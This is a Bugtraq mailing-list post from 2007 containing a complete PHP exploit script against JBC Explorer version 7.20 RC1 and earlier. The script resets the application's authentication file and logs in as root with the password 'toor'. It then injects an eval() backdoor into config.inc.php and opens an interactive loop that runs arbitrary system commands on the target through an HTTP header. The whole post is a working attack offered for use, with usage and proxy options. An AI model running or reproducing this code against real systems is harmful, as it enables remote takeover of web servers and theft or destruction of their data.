JBC Explorer <= V7.20 RC 1 Remote Code Execution Exploit

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: JBC Explorer <= V7.20 RC 1 Remote Code Execution Exploit
From: gmdarkfig@xxxxxxxxx
Date: 4 Nov 2007 20:17:14 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

#!/usr/bin/php
<?php
#
# This file require the PhpSploit class.
# If you want to use this class, the latest
# version can be downloaded from acid-root.new.fr.
##################################################
error_reporting(E_ALL ^ E_NOTICE);
require('phpsploitclass.php');

head();
if($argc < 3) usage();

$url = getparam('url', true);
$prx = getparam('proxy', false);
$pra = getparam('proxyauth', false);
$cod = 'eval($_SERVER[HTTP_SHELL]);';

$xpl = new phpsploit();
$xpl->agent('Mozilla Firefox');
$xpl->allowredirection(1);
$xpl->cookiejar(1);

if($prx) $xpl->proxy($prx);
if($pra) $xpl->proxyauth($pra);

print "0x01>Deleting the file auth.inc.php";
$xpl->post($url.'dirsys/modules/auth.php', 'suppr=1');

print "\n0x02>Creating the file auth.inc.php";
$xpl->post($url.'dirsys/modules/auth.php', 'login=root&password=toor');

print "\n0x03>Trying to log in as Administrator";
$xpl->post($url.'dirsys/modules/auth.php', 'login=root&password=toor');

// Minimum data necessary (fwrite without quote)
$minimdata =
'WIDTH_TREE_FRAME=1&FRAME_BORDER=1&WIDTH_FRAME_BORDER=1&WIDTH_FRAME_SP'.
'ACING=1&SCROLING_TREE_FRAME=1&RESIZE_FRAME=1&WIDTH_TD_SIZE=1&WIDTH_TD'.
'_TYPE=1&WIDTH_TD_DATE=1&STYLE=1&TOTALSIZE=1&CHECK_MAJ=1&IMAGE_BROWSER'.
'=1&IMAGE_TN=1&GD2=1&IMAGE_JPG=1&IMAGE_GIF=1&IMAGE_BMP=1&IMAGE_TN_SIZE'.
'=1&IMAGE_TN_COMPRESSION=1&NB_COLL_TN=1&EXIF_READER=1&SLIDE_SHOW=1&DEB'.
'UG=0;'.urlencode($cod).'//&SLIDE_SHOW_INT=1&BACK=1&WRITE_TN=1&AUTO_RE'.
'SIZE=1&DETAILS=1&DIRINFO_LIFE=1&activer_Message=1';

print "\n0x04>Creating the file config.inc.php";
$xpl->post($url.'dirsys/modules/config/post.php', $minimdata);
print "\n0x05>Now enter your commands";

do 
{
        $xpl->addheader('Shell', "@system($cmd);");
        $xpl->get($url.'dirsys/config.inc.php');
        print $xpl->getcontent()."\n0x06>";
}
while(!eregi('^quit|exit$', $cmd = trim(fgets(STDIN))));

exit(0);


function getparam($param,$opt='')
{
        global $argv;
        
        foreach($argv as $value => $key)
        {
                if($key == '-'.$param)
                   return $argv[$value+1];
        }
        
        if($opt)
           usage();
        else
           return FALSE;
}

function head()
{
        print 
        "\nJBC Explorer <= V7.20 RC 1\n".
        "Remote Code Execution Exploit\n\n".
        "by DarkFig <gmdarkfig (at) gmail (dot) com>\n".
        "http://acid-root.new.fr/\n";.
        "#acidroot@xxxxxxxxxxxxxxxx\n\n";
}

function usage()
{
        print
        "Usage:\n".
        "sploit.php -url <url> [Options]\n\n".
        "Options:\n".
        "-proxy <proxyhost:proxyport>".
        "\n-proxyauth <proxyuser:proxypwd>\n";
        
        exit(1);
}

?>

Prev by Date: Skalinks <= 1_5 Cross Site Request Forgery Add Admin
Next by Date: [SECURITY] [DSA 1398-1] New perdition packages fix arbitrary code execution
Previous by thread: Skalinks <= 1_5 Cross Site Request Forgery Add Admin
Next by thread: [SECURITY] [DSA 1398-1] New perdition packages fix arbitrary code execution
Index(es):
- Date
- Thread